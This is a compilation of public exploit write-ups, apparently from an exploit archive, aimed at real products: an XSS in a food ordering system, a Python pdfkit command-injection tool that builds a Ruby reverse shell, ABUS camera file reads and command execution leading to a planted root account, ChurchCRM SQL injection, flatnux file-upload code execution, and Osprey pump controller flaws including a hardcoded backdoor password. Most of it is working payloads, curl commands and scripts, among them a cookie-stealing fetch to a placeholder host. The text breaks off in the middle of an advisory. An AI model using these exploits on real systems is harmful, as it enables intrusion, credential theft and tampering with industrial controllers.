ISHACK AI BOT

# Exploit Title: Simple Food Ordering System v1.0 - Cross-Site Scripting (XSS) # Exploit Author: Muhammad Navaid Zafar Ansari # Date: 17 February 2023 ### CVE Assigned: **[CVE-2023-0902](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0902)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0902) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0902) ### Vendor Homepage: > https://www.sourcecodester.com ### Software Link: > [Simple Food Ordering System](https://www.sourcecodester.com/php/15418/simple-food-ordering-system-client-side-phpmysqli-free-source-code.html) ### Version: > v 1.0 # Tested on: Windows 11 ### What is Reflected Cross-Site Scripting: > Reflected cross-site scripting (XSS) is a type of web vulnerability that occurs when a web application fails to properly sanitize user input, allowing an attacker to inject malicious code into the application's response to a user's request. When the user's browser receives the response, the malicious code is executed, potentially allowing the attacker to steal sensitive information or take control of the user's account. ### Affected Page: > Vulnerable Page: process_order.php > In this page order parameter is vulnerable to Reflected Cross Site Scripting Attack ### Description: > The Reflected XSS found in order parameter of process_order.php page. Authenticated Reflected Cross-Site Scripting (XSS) is a serious vulnerability that can have a significant impact on the security of a web application and its users. The risk of Authenticated Reflected XSS is similar to that of Reflected XSS, but with the added danger that the attacker must first gain access to a valid user account in order to exploit the vulnerability. The main risk associated with Authenticated Reflected XSS is that it can allow an attacker to steal sensitive information or take control of a user's account on a web application. This can include login credentials, financial information, personal information, and more. Once an attacker gains access to a user's account, they can perform any actions that the user is authorized to do. In addition, Authenticated Reflected XSS can also be used as a stepping stone to launch more advanced attacks, such as phishing attacks, malware distribution, or distributed denial-of-service attacks. By gaining control of a user's account on a web application, an attacker can use that account as a launching point for further attacks against the user or the web application itself. ### Proof of Concept: > Initially, I tried to verify the XSS attack, I used standard XSS payload <script>alert("Verification");</script> and the Below Image confirmed that, the parameter is vulnerable to reflected XSS. > Payload: process_order.php?order=<script>alert(1)<%2fscript>mjii5 >  > Based on that, I have decided to make it realistic attack and use burp colloborator to hijack user cookie: > Payload: process_order.php?order=<script>fetch(%27http://dummyurl/%27,{method:%27POST%27,mode:%27no-cors%27,body:document.cookie});</script> >  ### Recommendation: > Whoever uses this CMS, should update line no 41 of process_order.php with the following code to avoid cross-site scripting attack: ``` Old Code: <?php echo $_GET['order']; ?> New Code: <?php echo htmlspecialchars(strip_tags($_GET['order'])); ?> ``` Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo

#!/usr/bin/env python3 # Exploit Title: pdfkit v0.8.7.2 - Command Injection # Date: 02/23/2023 # Exploit Author: UNICORD (NicPWNs & Dev-Yeoj) # Vendor Homepage: https://pdfkit.org/ # Software Link: https://github.com/pdfkit/pdfkit # Version: 0.0.0-0.8.7.2 # Tested on: pdfkit 0.8.6 # CVE: CVE-2022–25765 # Source: https://github.com/UNICORDev/exploit-CVE-2022-25765 # Description: The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. # Imports import time import sys import requests from urllib.parse import quote class color: red = '\033[91m' gold = '\033[93m' blue = '\033[36m' green = '\033[92m' no = '\033[0m' # Print UNICORD ASCII Art def UNICORD_ASCII(): print(rf""" {color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no} {color.red} ,~~`( )_( )-\| {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no} {color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no} {color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no} """) # Print exploit help menu def help(): print(r"""UNICORD Exploit for CVE-2022–25765 (pdfkit) - Command Injection Usage: python3 exploit-CVE-2022–25765.py -c <command> python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>] python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>] python3 exploit-CVE-2022–25765.py -h Options: -c Custom command mode. Provide command to generate custom payload with. -s Reverse shell mode. Provide local IP and port to generate reverse shell payload with. -w URL of website running vulnerable pdfkit. (Optional) -p POST parameter on website running vulnerable pdfkit. (Optional) -h Show this help menu. """) exit() def loading(spins): def spinning_cursor(): while True: for cursor in '|/-\\': yield cursor spinner = spinning_cursor() for _ in range(spins): sys.stdout.write(next(spinner)) sys.stdout.flush() time.sleep(0.1) sys.stdout.write('\b') # Run the exploit def exploit(payload, exploitMode, postArg): UNICORD_ASCII() print(f"{color.blue}UNICORD: {color.red}Exploit for CVE-2022–25765 (pdfkit) - Command Injection{color.no}") loading(15) print(f"{color.blue}OPTIONS: {color.gold}{modes[exploitMode]}{color.no}") print(f"{color.blue}PAYLOAD: {color.gold}" + payload + f"{color.no}") if "web" in exploitMode: if exploitMode == "webcommand": print( f"{color.blue}WARNING: {color.gold}Wrap custom command in \"quotes\" if it has spaces.{color.no}") else: print( f"{color.blue}LOCALIP: {color.gold}{listenIP}:{listenPort}{color.no}") print( f"{color.blue}WARNING: {color.gold}Be sure to start a local listener on the above IP and port. \"nc -lnvp {listenPort}\".{color.no}") print(f"{color.blue}WEBSITE: {color.gold}{website}{color.no}") print(f"{color.blue}POSTARG: {color.gold}{postArg}{color.no}") if "http" not in website: print( f"{color.blue}ERRORED: {color.red}Make sure website has schema! Like \"http://\".{color.no}") exit() postArg = postArg + "=" + quote(payload, safe="") try: response = requests.post(website, postArg) except: print( f"{color.blue}ERRORED: {color.red}Couldn't connect to website!{color.no}") exit() loading(15) print(f"{color.blue}EXPLOIT: {color.gold}Payload sent to website!{color.no}") loading(15) print(f"{color.blue}SUCCESS: {color.green}Exploit performed action.{color.no}") elif exploitMode == "command": print(f"{color.blue}WARNING: {color.gold}Wrap custom command in \"quotes\" if it has spaces.{color.no}") loading(15) print( f"{color.blue}EXPLOIT: {color.green}Copy the payload above into a PDFKit.new().to_pdf Ruby function or any application running vulnerable pdfkit.{color.no}") elif exploitMode == "shell": print(f"{color.blue}LOCALIP: {color.gold}{listenIP}:{listenPort}{color.no}") print(f"{color.blue}WARNING: {color.gold}Be sure to start a local listener on the above IP and port.{color.no}") loading(15) print( f"{color.blue}EXPLOIT: {color.green}Copy the payload above into a PDFKit.new().to_pdf Ruby function or any application running vulnerable pdfkit.{color.no}") exit() if __name__ == "__main__": args = ['-h', '-c', '-s', '-w', '-p'] modes = {'command': 'Custom Command Mode', 'shell': 'Reverse Shell Mode', 'webcommand': 'Custom Command Send to Target Website Mode', 'webshell': 'Reverse Shell Sent to Target Website Mode'} postArg = "url" if args[0] in sys.argv: help() elif args[1] in sys.argv and not args[2] in sys.argv: try: if sys.argv[sys.argv.index(args[1]) + 1] in args: raise command = sys.argv[sys.argv.index(args[1]) + 1] except: print( f"{color.blue}ERRORED: {color.red}Provide a custom command! \"-c <command>\"{color.no}") exit() payload = f"http://%20`{command}`" mode = "command" elif args[2] in sys.argv and not args[1] in sys.argv: try: if "-" in sys.argv[sys.argv.index(args[2]) + 1]: raise listenIP = sys.argv[sys.argv.index(args[2]) + 1] except: print( f"{color.blue}ERRORED: {color.red}Provide a target and port! \"-s <target-IP> <target-port>\"{color.no}") exit() try: if "-" in sys.argv[sys.argv.index(args[2]) + 2]: raise listenPort = sys.argv[sys.argv.index(args[2]) + 2] except: print( f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}") exit() payload = f"http://%20`ruby -rsocket -e'spawn(\"sh\",[:in,:out,:err]=>TCPSocket.new(\"{str(listenIP)}\",\"{str(listenPort)}\"))'`" mode = "shell" else: help() if args[3] in sys.argv and args[4] in sys.argv: try: if "-" in sys.argv[sys.argv.index(args[3]) + 1] and len(sys.argv[sys.argv.index(args[3]) + 1]) == 2: raise website = sys.argv[sys.argv.index(args[3]) + 1] mode = "web" + mode except: print( f"{color.blue}ERRORED: {color.red}Provide a target site and post parameter! \"-w <http://target.com/index.html> -p <parameter>\"{color.no}") exit() try: if "-" in sys.argv[sys.argv.index(args[4]) + 1] and len(sys.argv[sys.argv.index(args[4]) + 1]) == 2: raise postArg = sys.argv[sys.argv.index(args[4]) + 1] except: print( f"{color.blue}ERRORED: {color.red}Provide a target site and post parameter! \"-w <http://target.com/index.html> -p <parameter>\"{color.no}") exit() elif args[3] in sys.argv or args[4] in sys.argv: print( f"{color.blue}ERRORED: {color.red}Provide a target site and post parameter! \"-w <http://target.com/index.html> -p <parameter>\"{color.no}") exit() exploit(payload, mode, postArg)

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Exploit Title: ABUS Security Camera TVIP 20000-21150 - LFI, RCE and SSH Root Access # Date: 2023-02-16 # Exploit Author: [email protected] for NetworkSEC [NWSSA-001-2023] # Vendor Homepage: https://www.abus.com # Version/Model: TVIP 20000-21150 (probably many others) # Tested on: GM ARM Linux 2.6, Server: Boa/0.94.14rc21 # CVE: CVE-2023-26609 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++ 0x00 DESCRIPTION ++++++++++++++++++++ During a recent engagement, a network camera was discovered. Web fuzzing revealed a URL of /device containing output about running processes as well as a pretty complete listing of webcontent which inevitably arose our suspicion. More research revealed that files w/ known LFI and RCE issues were present, leading to either arbitrary file reads or remote code execution, both w/ root privileges and using known default credentials (either admin:admin or manufacture:erutcafunam). After closer filesystem inspection, RCE led to a remote root SSH shell. +++++++++++++++ 0x01 IMPACT +++++++++++++++ The LFI vulnerability can be exploited using a URL of: /cgi-bin/admin/fileread?READ.filePath=[filename] and is able to read any file on the system. The RCE vulnerability originates from a command injection and may be exploited by calling a URL of: /cgi-bin/mft/wireless_mft?ap=irrelevant;[command] (as classy as it can get, we can also use the pipe "|" instead, and linefeed a.k.a. "%0a" works as well) effectively giving us remote code (or rather command) execution. +++++++++++++++++++++++++++++++ 0x02 PROOF OF CONCEPT (PoC) +++++++++++++++++++++++++++++++ #!/bin/bash # # ABUS Security Camera LFI # curl -iv "http://admin:[email protected]/cgi-bin/admin/fileread?READ.filePath=/$1" The script can be called like: ./LFI.sh /etc/passwd to display the contents of the passwd file. When reading the configuration of the BOA server (/etc/boa.conf), we find hardcoded credentials: # MFT: Specify manufacture commands user name and password MFT manufacture erutcafunam These can now be used to execute the RCE (based on command injection): #!/bin/bash # # ABUS Security Camera RCE # curl -iv "http://manufacture:[email protected]/cgi-bin/mft/wireless_mft?ap=testname;$1" and can be called like: ./LFI.sh id to display a user id of uid=0(root) gid=0(root) +++++++++++++++++++++++++++++++ 0x03 SSH Remote Root Access +++++++++++++++++++++++++++++++ After having discovered the previously described vulnerabilities, multiple attempts to spawn a nice reverse shell failed as the system was minimal and did neither offer binaries like bash or netcat, nor any compilers or scripting language interpreters to execute our code. Furthermore, binaries that we transferred onto the system (for ARM little-endian architecture) either resulted in "Segmentation fault" (mfsvenom) or as we saw later "Illegal instruction" (netcat for ARM). We had to inspect the local attack surface and use the LOLBIN approach, a.k.a. living off the land binaries available on the system. In this case, the minimal and often busybox-included dropbear SSH daemon became pretty handy. To successfully implement a remote root SSH shell for persistance, several steps had to be undertaken: 1) First, we had to create a valid SSH keyset by reusing our RCE.sh skript: ./RCE.sh "/etc/dropbear/dropbearkey%20-t%20rsa%20-f%20/etc/dropbear/dropbear_rsa_host_key" 2) Then, add our user to the password file, e.g.: ./RCE.sh "echo%20d1g:OmE2EUpLJafIk:0:0:root:/:/bin/sh%20>>%20/etc/passwd" 3) Finally, start the server: ./RCE.sh "/etc/dropbear/dropbear%20-E%20-F" We can now SSH (using obsolete and insecure algorithms for both KeyExchange and HostKey) into our rootshell: sshpass -p XXXXXXX ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa [email protected] Welcome to _____ __ ___ __ ___ _ _ _ | ___| / \ / __ \ / \ | _ \ / \ \ \ / / | |___ / /\ \ | /__\ \ / /\ \ | | \ | / /\ \ \ V / | ___|| |__| | | _ / | |__| | | | | | | |__| | \ / | | | __ | | | \ \ | __ | | |_/ / | __ | | | |_| |_| |_| |_| \_\|_| |_| |___ / |_| |_| |_| For further information check: http://www.GM.com/ BusyBox v1.1.3 (2012.07.16-03:58+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands. [d1g]# id uid=0(root) gid=0(root) --- #EOF

## Exploit Title: ChurchCRM v4.5.3-121fcc1 - SQL Injection ## Author: nu11secur1ty ## Date: 02.27.2023 ## Vendor: http://churchcrm.io/ ## Software: https://github.com/ChurchCRM/CRM ## Reference: https://portswigger.net/web-security/sql-injection ## Description: In the manual insertion point 1 - parameter `EID` appears to be vulnerable to SQL injection attacks. No need for cookies, no need admin authentication and etc. The attacker easily can steal information from this system by using this vulnerability. STATUS: HIGH Vulnerability - CRITICAL [+]Payload: ```mysql --- Parameter: EID (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: EID=(select load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior')) OR NOT 2407=2407 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: EID=(select load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior')) AND (SELECT 9547 FROM (SELECT(SLEEP(3)))QEvX) Type: UNION query Title: MySQL UNION query (UTF8) - 11 columns Payload: EID=(select load_file('\\\\l4qwtfn9ngsxicbtklv0x1e1rsxllb92bq2gp6dv.smotaniak.com\\ior')) UNION ALL SELECT 'UTF8','UTF8',CONCAT(0x716a6b7a71,0x57646e6842556a56796a75716b504b4d6941786f7578696a4c557449796d76425645505670694b42,0x717a7a7871),'UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8','UTF8'# --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/ChurchCRM/2023/ChurchCRM-4.5.3-121fcc1) ## Proof and Exploit: [href](https://streamable.com/1eqhw2) ## Time spend: 01:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: flatnux-2021-03.25 - Remote Code Execution (Authenticated) # Exploit Author: Ömer Hasan Durmuş # Vendor Homepage: https://en.altervista.org # Software Link: http://flatnux.altervista.org/flatnux.html # Version: 2021-03.25 # Tested on: Windows/Linux POST /flatnux/filemanager.php?mode=t&filemanager_editor=ckeditor4&dir=misc/media/news&CKEditor=fckeditorsummary_en&CKEditorFuncNum=1&langCode=en HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------393526031113460918603940283286 Content-Length: 413 Origin: http://localhost Connection: close Referer: http://localhost/flatnux/controlcenter.php?page___xdb_news=1&opt=fnc_ccnf_section_news&mod=news&mode=edit&pk___xdb_news=1&desc_=1&order___xdb_news=date&op___xdb_news=insnew Cookie: fnuser=admin; secid=fe0d39d41d63bec72eda06bbc7942015; lang=en; ckCsrfToken=BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsb Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------393526031113460918603940283286 Content-Disposition: form-data; name="upload"; filename="info.php" Content-Type: application/octet-stream <?php phpinfo(); ?> -----------------------------393526031113460918603940283286 Content-Disposition: form-data; name="ckCsrfToken" BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsb -----------------------------393526031113460918603940283286--

# Exploit Title: Osprey Pump Controller 1.0.1 - Predictable Session Token / Session Hijack # Exploit Author: LiquidWorm Vendor: ProPump and Controls, Inc. Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com Affected version: Software Build ID 20211018, Production 10/18/2021 Mirage App: MirageAppManager, Release [1.0.1] Mirage Model 1, RetroBoard II Summary: Providing pumping systems and automated controls for golf courses and turf irrigation, municipal water and sewer, biogas, agricultural, and industrial markets. Osprey: door-mounted, irrigation and landscape pump controller. Technology hasn't changed dramatically on pump and electric motors in the last 30 years. Pump station controls are a different story. More than ever before, customers expect the smooth and efficient operation of VFD control. Communications—monitoring, remote control, and interfacing with irrigation computer programs—have become common requirements. Fast and reliable accessibility through cell phones has been a game changer. ProPump & Controls can handle any of your retrofit needs, from upgrading an older relay logic system to a powerful modern PLC controller, to converting your fixed speed or first generation VFD control system to the latest control platform with communications capabilities. We use a variety of solutions, from MCI-Flowtronex and Watertronics package panels to sophisticated SCADA systems capable of controlling and monitoring networks of hundreds of pump stations, valves, tanks, deep wells, or remote flow meters. User friendly system navigation allows quick and easy access to all critical pump station information with no password protection unless requested by the customer. Easy to understand control terminology allows any qualified pump technician the ability to make basic changes without support. Similar control and navigation platform compared to one of the most recognized golf pump station control systems for the last twenty years make it familiar to established golf service groups nationwide. Reliable push button navigation and LCD information screen allows the use of all existing control panel door switches to eliminate the common problems associated with touchscreens. Global system configuration possibilities allow it to be adapted to virtually any PLC or relay logic controlled pump stations being used in the industrial, municipal, agricultural and golf markets that operate variable or fixed speed. On board Wi-Fi and available cellular modem option allows complete remote access. Desc: The pump controller's ELF binary Mirage_CreateSessionCode.x contains a weak session token generation algorithm that can be predicted and can aid in authentication and authorization bypass attacks. Further, session hijacking is possible due to MitM attack exploiting clear-text transmission of sensitive data including session token in URL. Session ID predictability and randomness analysis of the variable areas of the Session ID was conducted and discovered a predictable pattern. The low entropy is generated by using four IVs comprised of username, password, ip address and hostname. Tested on: Apache/2.4.25 (Raspbian) Raspbian GNU/Linux 9 (stretch) GNU/Linux 4.14.79-v7+ (armv7l) Python 2.7.13 [GCC 6.3.0 20170516] GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5745 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5745.php 05.01.2023 -- sessionCode algorithm: ---------------------- for i in range(0, 80): foo = ord(userName[i]) + ord(userpassWord[i]) + ord(clientIP[i]) + ord(clientHost[i]) bar = foo + 7 if bar < 64 && bar > 57: bar = foo + 13 while bar > 90: bar = bar - 43 if bar < 64 && bar > 57: bar = bar - 37 sessionCode[i] += chr(bar) if sessionCode[i] == chr('\a'): sessionCode[i] = 0 break print(sessionCode.upper()) index.php (+cmdinj): -------------------- $dataRequest=$userName." ".$userPW." ".$client_IP." ".$client_HOST; $test=exec("Mirage_CreateSessionCode.x ". $dataRequest,$outData, $retVal); Session ID using user:password,ip,host 8GS1@7DB@7@@D5DKOPA@4DU4SKNH@OPNACI5JAP Session ID using admin:password,ip,host @DDUDFDIH@@@D5DKOPA@4DU4SKNH@OPNACI5JAP First 10 bytes are the user/pass combo. Hijack session: --------------- GET /menu.php?menuItem=119&userName=user&sessionCode=QKC1DHM7EFCAEC49875@CPCLCEGAP5EKI

# Exploit Title: Osprey Pump Controller 1.0.1 - Unauthenticated File Disclosure # Exploit Author: LiquidWorm Vendor: ProPump and Controls, Inc. Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com Affected version: Software Build ID 20211018, Production 10/18/2021 Mirage App: MirageAppManager, Release [1.0.1] Mirage Model 1, RetroBoard II Summary: Providing pumping systems and automated controls for golf courses and turf irrigation, municipal water and sewer, biogas, agricultural, and industrial markets. Osprey: door-mounted, irrigation and landscape pump controller. Technology hasn't changed dramatically on pump and electric motors in the last 30 years. Pump station controls are a different story. More than ever before, customers expect the smooth and efficient operation of VFD control. Communications—monitoring, remote control, and interfacing with irrigation computer programs—have become common requirements. Fast and reliable accessibility through cell phones has been a game changer. ProPump & Controls can handle any of your retrofit needs, from upgrading an older relay logic system to a powerful modern PLC controller, to converting your fixed speed or first generation VFD control system to the latest control platform with communications capabilities. We use a variety of solutions, from MCI-Flowtronex and Watertronics package panels to sophisticated SCADA systems capable of controlling and monitoring networks of hundreds of pump stations, valves, tanks, deep wells, or remote flow meters. User friendly system navigation allows quick and easy access to all critical pump station information with no password protection unless requested by the customer. Easy to understand control terminology allows any qualified pump technician the ability to make basic changes without support. Similar control and navigation platform compared to one of the most recognized golf pump station control systems for the last twenty years make it familiar to established golf service groups nationwide. Reliable push button navigation and LCD information screen allows the use of all existing control panel door switches to eliminate the common problems associated with touchscreens. Global system configuration possibilities allow it to be adapted to virtually any PLC or relay logic controlled pump stations being used in the industrial, municipal, agricultural and golf markets that operate variable or fixed speed. On board Wi-Fi and available cellular modem option allows complete remote access. Desc: The controller suffers from an unauthenticated file disclosure vulnerability. Using the 'eventFileSelected' GET parameter, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information. Tested on: Apache/2.4.25 (Raspbian) Raspbian GNU/Linux 9 (stretch) GNU/Linux 4.14.79-v7+ (armv7l) Python 2.7.13 [GCC 6.3.0 20170516] GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5746 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5746.php 05.01.2023 -- $ curl -s http://TARGET/DataLogView.php?eventFileSelected=/etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin ... ...

# Exploit Title: Osprey Pump Controller 1.0.1 - Administrator Backdoor Access # Exploit Author: LiquidWorm Vendor: ProPump and Controls, Inc. Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com Affected version: Software Build ID 20211018, Production 10/18/2021 Mirage App: MirageAppManager, Release [1.0.1] Mirage Model 1, RetroBoard II Summary: Providing pumping systems and automated controls for golf courses and turf irrigation, municipal water and sewer, biogas, agricultural, and industrial markets. Osprey: door-mounted, irrigation and landscape pump controller. Technology hasn't changed dramatically on pump and electric motors in the last 30 years. Pump station controls are a different story. More than ever before, customers expect the smooth and efficient operation of VFD control. Communications—monitoring, remote control, and interfacing with irrigation computer programs—have become common requirements. Fast and reliable accessibility through cell phones has been a game changer. ProPump & Controls can handle any of your retrofit needs, from upgrading an older relay logic system to a powerful modern PLC controller, to converting your fixed speed or first generation VFD control system to the latest control platform with communications capabilities. We use a variety of solutions, from MCI-Flowtronex and Watertronics package panels to sophisticated SCADA systems capable of controlling and monitoring networks of hundreds of pump stations, valves, tanks, deep wells, or remote flow meters. User friendly system navigation allows quick and easy access to all critical pump station information with no password protection unless requested by the customer. Easy to understand control terminology allows any qualified pump technician the ability to make basic changes without support. Similar control and navigation platform compared to one of the most recognized golf pump station control systems for the last twenty years make it familiar to established golf service groups nationwide. Reliable push button navigation and LCD information screen allows the use of all existing control panel door switches to eliminate the common problems associated with touchscreens. Global system configuration possibilities allow it to be adapted to virtually any PLC or relay logic controlled pump stations being used in the industrial, municipal, agricultural and golf markets that operate variable or fixed speed. On board Wi-Fi and available cellular modem option allows complete remote access. Desc: The controller has a hidden administrative account 'admin' that has the hardcoded password 'Mirage1234' that allows full access to the web management interface configuration. The user admin is not visible in Usernames & Passwords menu list (120) of the application and the password cannot be changed through any normal operation of the device. The backdoor lies in the /home/pi/Mirage/Mirage_ValidateSessionCode.x ELF binary. ---------------------------------------------------------------------- /home/pi/Mirage/Mirage_ValidateSessionCode.x -------------------------------------------- bd = strcmp(userName,"admin"); if (bd == 0) { userpassWord._0_4_ = 0x6172694d; userpassWord._4_4_ = 0x32316567; userpassWord._8_2_ = 0x3433; userpassWord[10] = '\0'; } ---------------------------------------------------------------------- Tested on: Apache/2.4.25 (Raspbian) Raspbian GNU/Linux 9 (stretch) GNU/Linux 4.14.79-v7+ (armv7l) Python 2.7.13 [GCC 6.3.0 20170516] GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5747 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5747.php 05.01.2023 -- $ curl -s http://TARGET/index.php --data="userName=admin&pseudonym=Mirage1234" HTTP/1.1 200 OK $ #Then ** Register Access Menu **

# Exploit Title: Osprey Pump Controller 1.0.1 - (pseudonym) Semi-blind Command Injection # Exploit Author: LiquidWorm Vendor: ProPump and Controls, Inc. Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com Affected version: Software Build ID 20211018, Production 10/18/2021 Mirage App: MirageAppManager, Release [1.0.1] Mirage Model 1, RetroBoard II Summary: Providing pumping systems and automated controls for golf courses and turf irrigation, municipal water and sewer, biogas, agricultural, and industrial markets. Osprey: door-mounted, irrigation and landscape pump controller. Technology hasn't changed dramatically on pump and electric motors in the last 30 years. Pump station controls are a different story. More than ever before, customers expect the smooth and efficient operation of VFD control. Communications—monitoring, remote control, and interfacing with irrigation computer programs—have become common requirements. Fast and reliable accessibility through cell phones has been a game changer. ProPump & Controls can handle any of your retrofit needs, from upgrading an older relay logic system to a powerful modern PLC controller, to converting your fixed speed or first generation VFD control system to the latest control platform with communications capabilities. We use a variety of solutions, from MCI-Flowtronex and Watertronics package panels to sophisticated SCADA systems capable of controlling and monitoring networks of hundreds of pump stations, valves, tanks, deep wells, or remote flow meters. User friendly system navigation allows quick and easy access to all critical pump station information with no password protection unless requested by the customer. Easy to understand control terminology allows any qualified pump technician the ability to make basic changes without support. Similar control and navigation platform compared to one of the most recognized golf pump station control systems for the last twenty years make it familiar to established golf service groups nationwide. Reliable push button navigation and LCD information screen allows the use of all existing control panel door switches to eliminate the common problems associated with touchscreens. Global system configuration possibilities allow it to be adapted to virtually any PLC or relay logic controlled pump stations being used in the industrial, municipal, agricultural and golf markets that operate variable or fixed speed. On board Wi-Fi and available cellular modem option allows complete remote access. Desc: The pump controller suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'pseudonym' HTTP POST parameter called by index.php script. Tested on: Apache/2.4.25 (Raspbian) Raspbian GNU/Linux 9 (stretch) GNU/Linux 4.14.79-v7+ (armv7l) Python 2.7.13 [GCC 6.3.0 20170516] GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5748 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5748.php 05.01.2023 -- $ curl -s http://TARGET/index.php --data="userName=thricer&pseudonym=%3Bpwd" HTTP/1.1 200 OK $ sleep 3 $ #Reflected URL Address Bar: http://TARGET/index.php?userName=thricer&sessionCode=/var/www/html

# Exploit Title: Osprey Pump Controller 1.0.1 - (userName) Blind Command Injection # Exploit Author: LiquidWorm Vendor: ProPump and Controls, Inc. Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com Affected version: Software Build ID 20211018, Production 10/18/2021 Mirage App: MirageAppManager, Release [1.0.1] Mirage Model 1, RetroBoard II Summary: Providing pumping systems and automated controls for golf courses and turf irrigation, municipal water and sewer, biogas, agricultural, and industrial markets. Osprey: door-mounted, irrigation and landscape pump controller. Technology hasn't changed dramatically on pump and electric motors in the last 30 years. Pump station controls are a different story. More than ever before, customers expect the smooth and efficient operation of VFD control. Communications—monitoring, remote control, and interfacing with irrigation computer programs—have become common requirements. Fast and reliable accessibility through cell phones has been a game changer. ProPump & Controls can handle any of your retrofit needs, from upgrading an older relay logic system to a powerful modern PLC controller, to converting your fixed speed or first generation VFD control system to the latest control platform with communications capabilities. We use a variety of solutions, from MCI-Flowtronex and Watertronics package panels to sophisticated SCADA systems capable of controlling and monitoring networks of hundreds of pump stations, valves, tanks, deep wells, or remote flow meters. User friendly system navigation allows quick and easy access to all critical pump station information with no password protection unless requested by the customer. Easy to understand control terminology allows any qualified pump technician the ability to make basic changes without support. Similar control and navigation platform compared to one of the most recognized golf pump station control systems for the last twenty years make it 